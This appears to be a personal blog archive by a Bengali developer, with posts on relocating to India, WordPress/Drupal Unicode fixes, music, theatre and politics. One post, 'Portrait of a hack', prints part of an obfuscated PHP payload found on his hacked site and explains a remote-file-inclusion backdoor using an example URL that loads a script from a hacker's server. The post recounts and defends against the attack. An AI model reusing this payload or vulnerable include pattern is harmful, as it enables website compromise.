The jouney begins - Part II

The planning can be clubbed in three broad groups -

1. Legal and Financial


2. Possessions


3. Relations

For Legal and Financial, the main thing was the immigration aspect. For us, it was securing some long-term Indian visa. For some of my friends who went back, the main issue was to keeping the Green Card alive. Paramita and kids had PIO. I had a 6-month Indian multiple-entry visa that I obtained in haste in August. First thing was to apply for my OCI. Kudos to San Francisco Consulate, the process was very clean and streamlined. It took just 3 weeks to get the OCI in hand. Foolishly I didn't keep a copy of the application number. Otherwise, I could have kept track of the process in detail over internet. I did that when I applied OCI for Paramita and the kids. It also took 3 weeks. For them it was a change from PIO to OCI.

A few people has asked about the practical difference between PIO and OCI. It seems the biggest practical difference is in case of OCI one doesn't need to go and register as Foreign National every six months with the Indian Government (through outposts in most major cities).

The only complaint that I have against the OCI application process is that websites of different consulates as well as the website of the ministry have conflicting information. Some are up-to-date, but a lot are dated. Depending on which website you hit, your application process may be erroneous. Like in our case, the right amount of fee for changing PIO to OCI was misinformed. That took away some precious time and money.

After the visa, it was time make sure we get paid in India and pay taxes. It was time for a PAN card. Permanent Account Number or PAN in India is equivalent to a Tax Identification Number or TIN in US.

The PAN application process is also quite streamlined, it seems. But for people residing outside India, like us, the main inconvenience is the to obtain the attestation for the address-proof. Regular notarization doesn't work. One needs to go to the nearest Indian Consulate to get this attested. It may not be too much of a hassle if one has ample time in hand. But for our case, it was definitely a big inconvenience.

I found a service on the net, pancardnri.com. They actually run a few more websites with different domains essentially providing the same service through the parent company nriinvestindia.com. The extra service they provide is to get your address proof attested. The rest is basically creating a Demand Draf on your behalf, submit the form and mail you back the acknowledgment etc. The price seems to be steep for the work done, but basically you pay for the convenience. I availed their service and received my PAN card in mail within the promised time.

The jouney begins

It all started on a March or April morning when I received a call from India. Will I be interested in applying for a position in MyCompany Bangalore? Of course, the name of the company is not MyCompany. But, that's besides the point here.

In last 4-5 years me and Paramita have explored the idea of going back to India in a semi-serious mode. That generally involved talking to people vising US from India, especially my Brother-In-Law, who comes at least once a year in summer.  That would be followed by some more phone calls to friends in India who had made the r2i journey at different times in past.

My position was that if I return, there is no point returning to any city other that Kolkata. But as time went by, I came down from that position since with the kind of career profiles we have, it's difficult to get the right kind of opportunity in Kolkata. There are a very few product companies in Kolkata. We both have spent most our working lives in product componies. If not Kolkata, Bangalore was the natural next choice.

When the call came I agreed to explore it with an open mind.

It was a long process. There were 4-5 telephone conversation (interview) over telephone. Then there was one in-person interview at MyCompany's local office. It was August by the time the in-person interview happened. My father suddenly passed away in August. I rushed back to India.

I came back with a  changed perspective. I was no more on an exploratory path. I was convinced that we should make the move. Now. MyCompany or not. My kids are 5 and 2. This is high time to make the move, if at all, for them too.

After I returned from India, me and Paramita had some deep discussions and decided we will try to make the move now. I won't say that Paramita was totally convinced, especially when approaching the issue from an emotional angle,  but she agreed to give it a serious try.

In early September, I started negotiating on the offer with MyCompany. Paramita started preparing her resume. We started thinking about the logistics. From that point onwards it became a hectic affair. I just joined a new company. Paramita had her fully-loaded job. Megh's school session had already started. We had to keep up our regular life and added this planning and execution, mostly planning at that stage, of R2I.

Resume parsing score

I found this on Web. Being a programmer, I found it funny, but quite true.

 

[Source: http://www.hanovsolutions.com/resume_comic.png]

Wordpress and Unicode

You type some non-English character in Wordpress or Drupal editors. You save it only to find those characters have become ????. If this describes your problem, then you have an issue with Unicode. You need to turn on Unicode support for Wordpress and Drupal. It will require some change of code. Basically, both Wordpress and Drupal supports Unicode. However, by default, the databases are not configured to store unicode characters.

Wordprss

For Wordpres, the modification is straight-forward.

1. Open up ‘wp-config.php’ from the root directory of your WordPress installation.


2. Comment out the following lines by adding ‘//’ at the very beginning of the following two lines:
   define('DB_CHARSET', 'utf8');
define(’DB_COLLATE’, ”);

So that section should now look like this:

//define('DB_CHARSET', 'utf8');
//define(’DB_COLLATE’, ”);

[Source: http://hansengel.wordpress.com/2007/10/09/wordpress-unicode-and-s/]

Drupal

For Drupal, the change is a bit more involved:

1. Go to to the root directory of your Drupal installation.


2. Save the following code in a file named collate_db.php


3. 
   

   <?php
   # Do not change anything below this ( :-) <- Rewwrite Editors note.)
   require_once("includes/bootstrap.inc");
   require_once("includes/database.inc");
   require_once("includes/database.mysql.inc");
   $connect_url = 'mysql://user:pwd@server/database';
   $active_db = db_connect($connect_url);
   $sql = 'SHOW TABLES';
   if ( !( $result = db_query( $sql ) ) ) {
         echo '<span >Get SHOW TABLE - SQL Error: ' . $result . '<br>' . "</span>\n";
      }
   
   while ( $tables = db_fetch_array($result) ) {
      echo $tables[0];
   # Loop through all tables in this database
     $table = $tables[key($tables)];
   
     if ( !( $result2 = db_query("ALTER TABLE %s COLLATE utf8_general_ci", $table) ) ) {
          echo '<span >UTF SET - SQL Error: <br>' . "</span>\n";
   
            break;
             }
   
     print "$table changed to UTF-8 successfully.<br>\n";
   
     # Now loop through all the fields within this table
     if ( !($result2 = db_query("SHOW COLUMNS FROM %s",$table) ) ) {
            echo '<span >Get Table Columns Query - SQL Error: <br>' . "</span>\n";
   
            break;
             }
   
     while ( $column = db_fetch_array( $result2 ) )
     {
        $field_name = $column['Field'];
        $field_type = $column['Type'];
   
        # Change text based fields
        $skipped_field_types = array('char', 'text', 'enum', 'set');
   
        foreach ( $skipped_field_types as $type )
        {
           if ( strpos($field_type, $type) !== false )
           {
              $sql4 = "ALTER TABLE $table CHANGE `$field_name` `$field_name` $field_type CHARACTER SET utf8 COLLATE utf8_bin";
              $result4 = db_query($sql4);
   
              echo "---- $field_name changed to UTF-8 successfully.<br>\n";
           }
        }
     }
     echo "<hr>\n";
   }
   ?>
   

   
   


4. Look at the red line in the code in red (5th line). You have to replace that part with your installation-specific information.


5. Open the file sites/default/settings.php under the same Drupal root directory. Copy the rest of the line of
   

   $db_url =

   
   and paste it after
   

   $connect_url = 

   
   in the above code.


6. Save collate_db.php


7. Open a browser window and request the collate_db.php from your browser.


8. If everything is fine you would see something similar to this:
   access changed to UTF-8 successfully.
   ---- mask changed to UTF-8 successfully.
   ---- type changed to UTF-8 successfully.
   

   ---

   <--- Lines not shown --->
   

   ---

   watchdog changed to UTF-8 successfully.
   ---- type changed to UTF-8 successfully.
   ---- message changed to UTF-8 successfully.
   ---- variables changed to UTF-8 successfully.
   ---- link changed to UTF-8 successfully.
   ---- location changed to UTF-8 successfully.
   ---- referer changed to UTF-8 successfully.
   ---- hostname changed to UTF-8 successfully.
   

   ---



9. Delete collate_db.php for security.

You are done.

[Source: http://www.urbannatives.net/localtreechild/..._ci_and_tabl ]

Baul

I cannot claim myself to be any expert on Baul songs. I have heard my share of Baul songs, mostly from radio. However, I have been fortunate to have two coincidences working for me in this respect. First, I like wrtings of Sudhir Chakrabarti. He was a professor of Bengali, but his passion was Bangla songs. Though he started writing rather late, he has been relentless in churning out articles since he started writing popular articles with seriousness. These articles are not just nonsensical pot-boilers. There are goods and bads, but none is insignificant. Sudhirbabu's other passion is Bengali Folk culture. I think I have painted the description of the passion with too broad a brush, but could not find a better description than this. He doesn't do it as a paid occupation. It's his labor of love. I don't know whether he follows the right research methodologies or not. But I could not care less. His research produced books like ব্রাত্য-লোকায়ত লালন (Bratyo Lokayoto Lalon), বাউল ফকির কথা (Baul Phakir Katha). Through these books and other writings of Sudhirbabu I got interested in the Baul way of life, and especially the Baul songs, though I learned that Baul songs are part of the Baul way of life. Without understanding or experiencing the Baul way of life one can neither appreciate nor fathom the Baul songs.

My other, and possibly bigger, influence for Baul songs is my friend Sudipto Chatterjee. Sudipto teaches and works in theater and performace stidues. But he picked up a penchant for Lalon Shah pretty early on. I remember the day when I first met him, about fifteen years ago, he boasted that he had already collected all Lalon songs. Only later I could understand his pride in that posession. He (and Theater director Sumon Mukhopadhyay) travelled to Kushthita, Lalon's birth and workplace, in Bangladesh in 1997. The materials they collected there, and since then, finally bore fruit in the form of a Perfomance called "The Man Of The Heart". A performance on Lalon's life and work, writtent and performed by Sudipto and directed by Sumon. I have heard numerous Lalon songs from Sudipto, along with stories, anecdotes and explanations. I heard about Panju Shah, Duddu Shah first through him. These, Sudhirbabu's books, gave me a better idea about the journey of Baul culture through history, both social and political. In most case, these two were intermingled intimately.

Later, thorugh a Bangla folk band called দোহার (Dohar), I first heard Abdul Karim's song. And I was bowled over immediately. Later I tried to dig up information from the web about Abdul Karim, who uses Baul Abdul Karim as his bhonita in some songs. There is not alot of information about him on the web, at least not as much to satisfy my curiosity. However, I came to know that he is still alive and well, though he is over 90 years of age. He still writes songs. But he has already become an institution in Bangladesh. I could not figure out whether he leads a strict Baul life. But that does not matter to me at his point. You can check out some of his songs in Youtube by searching on his name.

Ain’t No Luddite

I am not an adopter. I don't work to stay ahead of the technology curve. Rather, I fall quite far back in that curve to see all my friends and most of my family and acquaintances pass by me and my wife. But the truth is that I am quite happy and content being a follower. I keep my OS at least one version behind the latest and the greatest. Currently, even though my sparingly-used Windows machine runs XP (used only for music production since I have already invested money and learning-time on software that runs only on Windows), I have the latest OS version (Ubuntu Intrepid Ibex 8.10) on my primary home machine. I resisted having a cell phone for quite some time before finally jumping on the bandwagon in 2003. Even then I have pretty basic cell phone which is used as a - surprise! surprise! - phone to call people. No blackberry, no iPhone, no Android, no nothing. We don't have a LCD or Plasma TV, mostly because we don't need it. We don't watch TV or movies that much. 90% of time, our TV is playing either Baby Einstein DVD or PBS Kids show. Our DVD player is a $25 Coby. My home theater is a 8-year old system. My Bose Acoustimass speakers are sitting comfortably in the closet, gathering dust. Five-and-half-years since we have moved into this house, I didn't get energy, urge or serious nudge from Paramita to hook those on. On the social networking side, I have got onto Orkut after a having a dormant account for quite a while, thanks to Paramita for finally making me active there. But that's been almost one-and-half years. By that time most of my friends there have moved on to the greener pasture of Facebook. I have too. But only recently. And I am still trying to figure things out there. Now I see people are using Twitter. I guess, it will take me at least an year or two before I get on to Twitter.

The reason I started this post is, I think the best thing that have happened in last two years on the Technology side, as far as I am concerned, is Pandora. It's really awesome. Those who haven't yet found Pandora: it's a Music Genome Project. The site says:

Together we set out to capture the essence of music at the most fundamental level. We ended up assembling literally hundreds of musical attributes or "genes" into a very large Music Genome. Taken together these genes capture the unique and magical musical identity of a song - everything from melody, harmony and rhythm, to instrumentation, orchestration, arrangement, lyrics, and of course the rich world of singing and vocal harmony. It's not about what a band looks like, or what genre they supposedly belong to, or about who buys their records - it's about what each individual song sounds like.

So the idea is that you start with one of your favorite songs. Then based on the musical attributes of the song, Pandora will select other songs. For each song, you can tell Pandora whether you like this song or not, thereby 'training' Pandora to your taste. You can create 'Radio Stations' based upon this song. A 'Radio Station' can be created by Artist or by Genre too. There is a cool feature called Quick Mix, which is basically a random play of songs from Station you have selected.

It's really easier to experience and experimet with Pandora than explain how it works. You need a registration for creating Stations. But registration is free and require very little information. However, there is one caveat. The service is only for North American audience. I understand that is due to some licensing issue. If you are in North Americal (or have an North American IP address ... wink wink), go there and have some wonderful musical experience.

BonGoLipi

Finally released Bongolipi.

Don’t Read This …

... instead, read Robert Fisk in The Independent - Why do they hate the West so much, we will ask. What I wanted to say and could not, is there.

...

As we are entering into the new year, the news and life is bleak all around. This is particularly true for the people in Gaza. They are a hapless victim of a lethal pounding from Israel. What Israel is doing in the name of 'self-defence' is totally and absolutely unacceptable to any person of rationality and conscience. This is not to condone the behavior of Hamas, but a much bigger blame must be affixed to Israel. But I guess this is somewhat expected from a aggressor and occupier like Israel.

What is more unacceptable to me is US foreign policy towards Israel and Palestine. In 2008 Israel was the recipient of the biggest chunk of US aid. 2.4 Billion. "Virtually all of this money is used to buy weapons (up to 75% made in the U.S.). Beginning in 2009, the U.S. plans to give $30 billion over 10 years." (Source: Parade magazine) I have tried to figure out the reason for this uncritical and total support of Israel from US, especially if we remember the English statesman Lord Palmerston's aphorism that "Nations have no permanent friends or allies, they only have permanent interests." It is true that US has to have a strong ally in that region. It's strategic importance is too high to ignore for US. Israel fulfills that requirement. However, it has also become quite clear that the blind support of Israel and its aggression is given rise to a deep hatred towards US. Not only in that region alone, but all around, especially with such a blatant nonchalance from Israel's part when more than a quarter of the victims are civilians, mostly children. Israel-Palestine issue has become a very potent tool for separatists and terrorists to recruit and deploy youths all around the globe - be it Middle East, Afganistan, Iraq, Pakistan or Kashmir. In the final tally, a blind support of Israel's aggression retuns a negetive balance to USA's foreign policy balance sheet. I guess, US can still support Israel and it's existence and still maintain some semblance of balance. It may not be an easy task. But the deplomats and the elected officials are not selected or eleced to do easy tasks.

Fast food for thought

I just rebooted my office machine running CentOS 4.6, which is based on Red Hat Enterprise distribution. It was running for 121 days, i.e almost 4 months!!

Ubuntu Intrepid and vpnc

My company has a decent work-from-home policy. Every Thursday we can work from home. And most do, including myself. In addition to the regular Thursdays, we work from home whenever there are project deadlines - which is almost always. Hence, to have a solid VPN connection is a must for me.

My last non-Ubuntu desktop was Fedora. I compiled the Cisco vpnclient and used it without a problem. When I switched to Ubuntu Edgy (6.10) I started using the open source vpnc which worked quite nicely. The upgrade to Fiesty (7.04) and Gutsy (7.10) worked fine too. But from Hardy (8.04) the problem of dead-peer-detection raised its ugly head. There were patches available, but that didn't solve the problem for me. I was looking forward to the Intrepid (8.10) release hoping the the vpnc issue will be resolved for good. After Intrepid was released there were contradictory reports about whether the dead-peer-detection issue has been resolved. I decided to test it out myself. So I upgraded to Intrepid.

vpnc can be used from command line, or else one can install the vpnc plugin for the network-manager (nm) and control the vpnc connection from the network-manager applet. Until now, I have only used the command-line. But this time I have tried both for testing. This is what I have found:

• The dead-peer-detection issue is solved both in the command-line client as well as network-manager plugin when you pass the dead-peer-detection interval value 0 to the command-line program or check a box in the network-manager plugin.


• network-manager plugin has a bug that overwrites the resolv.conf when the VPN is disconnected. I am forgetting what exactly is the nature of the bug, but basically it didn't revert back to the original resolv.conf after VPN session ended. The bug may only be for the static IPs.


• Even if the dead-peer-detection issue was resolved, my VPN connection would just stall for a minute or two before continuing after I have typed about 10-15 characters in my SSH window. And this repeats over and over again. Googling the problem suggests something to do with routing table and/or DNS lookup. I tried different things for a while but none could resolve this issue.

At last I gave up and went back to the proprietary cisco vpnclient. I compiled and installed it following this post. Since then I am having a smooth VPN ride. I would love to go back to the open source vpnc client, but not at the expense of stability of connection. I need to earn my bread.

The new voice of our time

A couple of weeks back our local cultural association Sanskriti organized its fourth Natyomela - a Theater festival. Our group ENAD could not participate in the festival this time. However, this year Sanskriti introduced a slot for an "outside" group. That outside group was ECTA from New Jersey. They brought a new play Taconic Parkway, written and directed by Sudipta Bhowmik.

Sudipta Bhowmik was somewhat known to the bay-area theater aficionados. He is operating in Bengali theater scene in north America for a while now. He is quite well-known especially in the east-coast circuit. For some reason, he never got a chance to bring his play to the west coast before. We, at EAND, were happy to do Ron - our last production - which was his play. I think that was the first exposure people got to Sudipta Bhowmik's work here in the bay area.

This time he also directed his three-cast play Taconic Parkway. It's a very powerful play. It may not put you in an internal conflict that Ron might have, but this play may well put you in a spell. He has masterfully woven an unusual story in a non-histrionic way. (That is, if you take the negative connotation of histrionics.) I will go out on limbs and say that Sudipta Bhowmik is producing some of the most powerful and important Bengali plays of our time. That includes Kolkata and West Bengal. (I am not very conversant with Dhaka's, or Bangladesh as a whole, contemporary plays, mostly due to accessibility problem.) More importantly, he is providing a glimpse to the actual USA-residing Bengalees. This is not the picture you get in mainstream magazines and mundane media portrayal.

Someday, I hope to write a more studied observation of his plays through more minute reading, but as a somewhat informed audience I can only appreciate his work. He is definitely blessed with some very competent actors. I am sure that helps him not only to mount a good play as a director, but also as a playwright since he can experiment with his characters. But still, the bottom line remains that he is writing some worthwhile plays of our time.

Thank you Sudiptada. Thank you for the plays.

Tin Pahaarer Gaan

I came across Birendra Chattopadhyay's work when, I believe, I was in high school or in first year of college. My impressionable mind immediately fell in love with his work. He was never a mainstream poet. But his poetry borne a unique and strong voice which I seldom found in others. Around the same time I found a cassette published by School of People's Art which contained songs and recitation of Birendra Chattopadhyay's poems. The songs were created out of his poems by Binoy Chakrabarty. He did and excellent job. Together with the poems and this cassette, Birendra Chattopadhyay made a lasting impression.





I loved a long poem called 'Tin Pahaarer Gaan' literally "The song of Three Mountains" or "The song of a mountain called Tin Pahaar". I starts with 'Pahariya madhupur metho dhulipoth' and continues to give a vivid and wonderful imagery. Around that time I also started composing songs. So I put tune to it - not tothe whole poem though. I stopped when I thought was the right moment for a song to stop. This was 1988-89. I kept it to myself and never published it. In 2007 I arranged it. This is that song.

Portrait of a hack

It's been a long time since I updated the page. Again. As I was intending to update the page with the report of my latest endeavor, something unexpected happened.

Last Sunday morning, I woke up to receive a terse mail from my hosting company - Host Monster - that my basus.net account had been deactivated due to "terms of service violation". So I called them. The Tech support guy confirmed that the account had really been deactivated because there is a phishing page lurking inside my site. He suggested that I talk to their Abuse department. Even though it was a Sunday, there was somebody in Abuse department I could talk to. She pointed me to a directory called 1/ inside my webroot folder. That, and few other files, seems to be gratuitous contributions of the hackers. She said once I removed the offending pages and they confirmed that I did, they could reactivate the account. I got off the phone and the first thing I did was to remove the 1/ directory. Looking back, I think, that was a knee-jerk reaction. I could have avoided that. I, then, moved my original webroot folder and put up a placeholder page instead. After these minor surgeries I called my hosting company's abuse department. She looked at the directory to confirm that the offending pages are really gone. Once confirmed she immediately reactivated my account. I briefly chatted with her about the possible backdoor and inquired if they had any tool to sniff backdoor. They don't have any tool but she gave me pointers to some usual suspect applications. Fortunately I didn't have any such application. However, that's unfortunate too, since now I have to hunt the backdoor myself manually. It also means that the backdoor is possibly an inadvertent creation of my sloppy coding. Tooo baad.

But one thing I want to mention here, I found my hosting company's support impeccable. They were helpful, to-the-point and not too finicky. Deactivating my site showed they had a good policy in place against questionable content. Kudos.

Once my mail server etc. are back online and offending material offline, I had a few tasks at hand. In order of priority, they were:

1. Remove all injected files and content


2. Find and fix backdoor


3. Put site back online

So, here are some interesting things I have found on the way. These must have been well-documented in some security website. But, here is what I have found.

Modus Operandi: Once the hackers find a backdoor, they push a file through the backdoor. This file then becomes the hacker's gateway. They come and go through this door at will. They can pretty much see what's there inside, put files (scripts) there and sometimes hijacks the site.

File Extension: Some of the initial files that the hackers upload had .jpg extensions but they are actually PHP scripts. For example, php3.jpg, lila.jpg or sh6.jpg. I think, they want the site owner to overlook any .jpg file thinking they are image files hence harmless. PHP engine, though, is not fooled by the extension. It will execute file any extension as long as it is valid php code.

Offending files: The most interesting is php3.jpg. It looks like a binary file

 <? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
B69VdTxCCJBZhCUBNv3WBZ1r+P59V3YicpFSCzau
qu5ZzvRMt1EukZFbZERkZMRvJx9+mw6mf/2LorQc
1XKMSV/S1NHI/utfjJ60+a43m2iOYU7u9SfDduxN
ua87Y0OzTMcY6/LWlvQ7LyGJOZuQMYIKmxszW9di
0gb8d0v6KOlP05HZ1TdlSY5JQumtY8nSnZk1kTY3
eyNTdbZIRWlb4p8I4Pjr17/+Rbcs07q39KlJsN3c
2zr+61/+bvQnpqXfQyXrXu1A1ma7eVkgWbbu3I/V
vqHdP85MR7fvrdmEtJrA7I2FMQHEbMdyzJG50K1N
e9aBr836Wf2+1oolYrvQy48fJRkKylChq/eMCfTA
xuEioxDz9xyh4tj1g+32p9omjlj0wEKbxtT2DylN
2/x5Q7Ws2Mbwoyyz6oZ9D0nq8ybmkCrQe1UbkG9J
tSUofLIxZ6VJ52bTKXRuY7glvYPOnJZr2Uy5hfBY
I1jzk7wxlL/gOH+V9JGtS78TeB8ZIiPVHui0JC3D
qzJokAgDet8sNC4LrTZUIzjej3Wrr29u3OdqtYtS
IbZxf1pow3/rtVYbx8pF3a0YxP+dYcMkbm4A8pAC
fwD0xpysBmjPHsx1xFFOxhPS1NJ3LH2kq4B8Z2aM
utJPyX35WFKU3Myy9IkjQWEbxhZXfK5WLZZOL5uZ
dqlWlTLVvNQqtNul6mmLrX59PHVgjGcTXEP2zBph
+/BbM82hAWtAOzqyByRDhhW8gT8QERnHAcdPBCKC

However, if you look closely, you will notice that it starts with "<? eval(gzinflate(base64_decode('". This basically tells the PHP engine to inflate the gzipped and base64 encoded content that follows. When I explode, it became a html which looks like this in a browser



Backdoor: There were a couple of backdoors in my site (at least the ones that I have found). All of them are similar.

PHP script can run another script by calling a function named include(). Suppose you have a script named foo.php and another named bar.php. In foo.php you may have a call like:

include('bar.php')

Now if you request foo.php from a browser, it will also execute bar.php, even though bar.php was not explicitly called or requested.

Now the bar.php does not need to reside on the same directory or even the same file system. bar.php may be sitting on a different webserver, 10000 miles away, reachable via a HTTP call - http://bar.com/bar.php. Now, still foo.php can execute bar.php via http. Your include will simply say,

include('http://bar.com/bar.php')

PHP will take care of opening a socket to the bar.com server, create a HTTP request to bar.php and execute its content after receiving the HTTP response.

Now, suppose, instead of hard-coded http://bar.com/bar.php as the argument of the include() call, you pass a request parameter - something that you got via a POST or a query-string.

$myscript = _REQUEST('myscript');
include('$myscript);

Now, you have a backdoor. How so? If a malicious hacker knows about this two lines, she can make a request to foo.php like this

http://<servername>/foo.php?myscript=http://<hackersserver>/malicious_script.php

foo.php will obidiently execute whatever malicious_script.php asks it to do. Now the question is how the hackers know of those to line of code. By looking at other links on your site (or other sites which links to your site) and guessing. This is not difficult.

I precisely had this backdoor. Three of them. I think hackers exploited two out of three. I have fixed the code, or I think I have until hackers expose another backdoor. I have also written couple of monitoring and reporting scripts which will periodically look for any change in my site. Let's see what happens.

On a subsequent post, I will try to write more about the files the hackers put.

Update: I never got a chance to write more about the files the hackers uploaded. However, another thing of importance here. The hackers modified my root .htaccess file. That's the configuration file for Apache web server and it affects the tree underneath, unless overwritten by another local .htaccess file. They put a Rewrite rule in the .htaccess. Apache rewrite rule basically can modify a request line. For example, a browser may request for a file called "foo.html". Via Rewrite rule, you can serve some other file, say "whatever.html". Since, this happens without browser's knowledge, browser still thinks that it got the requested foo.html file. That's exactly what happened in my case. The hackers wrote a rewrite rule in such a way that if a request came through a search result (identified by the Referer header), it shows some Viagra ad page that they uploaded. And be careful, they bury the Rewrite rule in .htaccess file after a bunch of blank lines, so that when you open the file in an editor, you won't see it without scrolling down. Very clever.

Super Tuesday

Song puzzles

I have some old recordings in my possession. Old means really old - at least fifty years or more. I have a cousin, who is a professional Audio Engineer with a big studio in India. But his passion is music from a very very tender age. As they say, he lives for music. When he was a student, he used to roam around in Kolkata to collect old records. I guess these recordings came from those ventures. These are recorded from noisy 78 RPM disks. I haven't tried to cleanup the recordings. I have noticed in my earlier attempts of cleaning that unless one has lots of time and really good tools, it's better to leave the noise. Incompetent noise-reduction kills the song more than the noise does.

Move over to my Music Broadcast page and listen to the Recognize the singers section. If you can recognize them before I publish the name, drop me a line.

What is a great art?

I have found that my idea of art and its impact on the audience has changed over time. I understand, this is quite natural and most everybody else also experience this changing attitude towards art and its effect over time. It's just the other side of the fact that I get moved differently every time I read, say, the play Daakghar (The Post Office).

Art, no matter what form, needs to move its target audience emotionally. We - this term may need some elaboration, but please take it on the face value for now - tend to over-analyze art. I even feel that sometimes we go to some concert or play or read some book just to analyze and critique the art. And in the process we forget to enjoy it. May be, on a subconscious level, we are thinking, "I may not be an artist but I am a critique who can analyze and tear apart any artist's work - main hoon baap kaa baap".

What I said above is not directed to anybody in particular but me. I few months back I realized this sad fact that the gratuitous critic in me is coming in the way of my enjoyment and the art. My training and knowledge in some form of art, namely music and drama, is not helping me either. During an intense dramatic moment of a play, part of my mind is analyzing the blocking, the lights, the actors' business and so on. While listening a new song, my mind gets unnecessarily concentrated on the arrangement of the song, the chord progression, the crispness of the recording. In the process the dramatic moment and the song is gone, probably forever. The first experience never comes back.

I am actively trying to correct it since I found this lacking of mine. And trust me, it's not easy. Apart from untraining and retraining my senses and mind, there are some more philosophical dilemma to sort out. The biggest of them is, "Just because an art moves me emotionally, should I call it a great piece of art?" I tend to answer a subjective "yes" though I am fully aware that some second rate tearjerkers can and do move me emotionally quite often. And of course there is the other side too, where a piece, which is considered great art by many, failed to impress me at all. However, I rationalize that by accepting that it may be a result of my improper training.

The bottom line of art appreciation is training. Most of us are self-trained in art appreciation and most of us are smart enough to separate wheat from chaff. The problem is with the borderline staff - the staff that cannot be called great at the first experience nor cannot be pushed aside as crap. A great art will move you emotionally as well as give you enough food for thought that you ruminate for a few days, if not weeks. A crap art will give you neither. The borderline case will give you some. Unfortunately, the world of art is full of these borderline cases. And the fact that it is majority in the world of art forces us to bring out the critic from inside us more often than it forces us to just sit back and enjoy. That's a sad fact of thinking life.

After a hiatus

I just finished directing a play by Sudipta Bhawmik called Ron. It's a very relevant story of our time waited to be told. Sudiptada has weaved a magic spell of contemporary tale on an age-old philosophical conflict between the need to fight some wars and the principled position of anti-war. This not only looks at the current time, it does so from the first generation and second generation immigrants' perspective.

After the play there was a short Q&A session with the playwright where he said that the play is definitely anti-war. But I am positive nobody can call it propagandist. I actually found it to be well-balanced and portrays the viewpoint of a soldier and his family's perspective in a very touching way.

After being involved with immigrant Bengali community theater for about 7-8 years, what I find most challenging is to capture the imagination of the community. The issues, the problems, the dreams, the hopes, the frustrations, the achievements of the first generation immigrants are different from the folks back home. Yes, this is true that the first generation, especially we the Bengalis, do enjoy living in a bubble of nostalgia when it comes to culture. We prefer Rabindrasangeet over classic Jazz, Bhimsen Joshi over George Gershwin, Kishore Kumar over Norah Jones. We prefer to go and see the current crops of group theater when we visit Kolkata, but seldom make attempts to see the local repertory theater's productions. However, we do live our lives outside that bubble and constantly get challenged by a different world than what we used to face back home. Our theater should capture that.

In Ron, I thought, Sudiptada could strike the golden balance there where he could evoke a sense of nostalgia within the realm of our everyday existence. Our third production Chhenra Collage also struck that balance, it seems. Even after our tenth production some of the regular audience still refer to the third production. I may have some conjectures as to why this is happening, but cannot really tell for sure. But one thing is for sure, I like to continue doing this kind of theater where we can introspect our contemporary lives with compassion and humor.

One more host change

For past few days I have been busy with accommodating another change of my host. This is my second change in as many months. I was hosting with 1and1.com since 2005. It was a decent host - excellent top notch service as far as server up-time, availability and speed are concerned. However two of the peeves that I had were it didn't offer enough features for the dough and there was no ssh service for my plan. 1and1.com also seems to have configured its service in a nonstandard way. For example, even with your own domain, your mail server domains will be 1and1.com; you cannot choose your own username for login, you are are forced to remember some random string of digits.

So I moved my host to Dreamhost on October. It has a very impressive array of features for a very decent price. I have seen its server held quite firm after a digg effect on one of the domains it hosted. Also read some reviews which even though didn't put it in the top performer slot, nevertheless put in somewhere near there. Since, my site is very very low traffic site, I didn't bother. But I should have. After moving, I spent quite a bit of time redesigning my site, only to discover that server response is not very good - barely acceptable. But the real damper was its mail server. The server that hosted my mailserver had a history of problem and Dreamhost was in the process of upgrading the hardware when I moved my host. Dada was complaining that he basically couldn't do anything on his mailbox. He was connecting via IMAP. The only think he could do is downloading the headers, but server timed-out 9 out of 10 times while downloading the body. I thought it was temporary. But even after the claimed hardware upgrade, things didn't improve. At that point I decided to quit. But to be fair, I must say that I didn't have any problem connecting to the mail server using POP3. In conclusion, I think Dreamhost has good intentions and all the makings of a good host, but it may need to put a lot more focus on performance at this time.

Then enters HostMonster. I read very good reviews about the host. More than one review sites put it on the top of the heap. It claims to host more than 200,000 domains. Even though most of the things in all Linux hosts are almost same, they have enough differences in settings that warrant at least a couple of days of tweaking my code to run seamlessly. Same story here. Finally I think I am done. The jury is still out, but so far I am seeing improved speed of access. Dada informed me that he now has no problem with mail connection using IMAP. Hopefully I can stay with these guys for some time.

Procrastinate

This is the middle of the week. A dose of procrastination will be good for you.


I have lifted it from somebody else's page. I don't know who created it or who holds the copyright. If you have information, please let me know - I will update this entry. Also, I had to scale down the image to fit in my page without messing up the formatting of the page. The full version is more interesting.

Durga Pujo

India is a land of mythology with innumerable gods and goddesses. One of those goddesses is Durga. Durga is a mythical goddess, also referred to in Ramayana. Ram invoked Durga before going to war against Ravan. There are certain days in a year when Durga puja (ritualistic worshipping) happens.

Hindu Bengalis have taken this puja to a different level. Its is the Puja to them. It's not so much a religious festival anymore, but has become a social and cultural carnival of the year. West bengal, especially Kolkata, and I guess Tripura also, goes into an inebriated state for almost a week. The economy rolls as if it were on drugs. Wastage flows on high adrenalin. Everybody, unless there is some significant event of sorrow in life, transcends into a state of undefined exuberance. And that includes poorest of the poor people too, who are never considered when generalized statements are written with the word 'everybody'. This is one of the most inclusive festivals. Not that the poor people's problems and sorrow mitigates overnight, but the way economy rolls in those few days, the earnings of the poor exceeds their normal time earnings.

Today is the start of the festival - Shashthi, the sixth day of the lunar cycle. From the religious point, on this day the godess is invoked into the idol. The claydolls comes to life and becomes Dev and Devis. I always find the mythological storytelling of these pujas more interesting than its religious connotations. Puran, the Indian mythology, tells us that this is actually the time when Durga with her four children visits her parental home in Bengal from Kailash where she and the children stay with her husband Shiv. The tenth day of the lunar cycle - Dashami - is when they leave to go back to Kailash. After they leave, the idols become lifeless clay-dolls again and are immersed in Ganges and the festival comes to an end.

On this opening day of the festival, I reproduce an wonderful article by Vir Sangvi on this topic: Durga Pujo in Calcutta (What "Pujo" means to a Bengali). This was published in Hindustan Times some years back.

Durga Pujo in Calcutta (What "Pujo" means to a Bengali)

Vir Sanghvi

It's always hard to explain to somebody who does not live in Calcutta what it is about Puja that makes that period so magical. Before I came to live in Calcutta in 1980, I was only dimly aware of the significance of Puja. I knew the boring facts and figures, of course. I knew what proportion of annual retail sales took place during the Puja period. I knew that the city shut down for the whole week. I knew that at ABP - where I was soon to work - telephone operators would, strangely enough, take the trouble of coming to work, only so that they could receive incoming calls, shout "Pujo", and then hang up on irate out-of-town callers.

It's like Christmas, they told me. Imagine Christmas in New York: Puja means that to a Bengali. Others found more home-grown parallels. It's like Diwali in North India, they said. You know, the shopping, the parties, the festivities and all that stuff.

Actually, of course, it was nothing like Christmas; and certainly nothing like Diwali in North India.

Nothing, in fact, can prepare you for the magic of Puja in Calcutta.

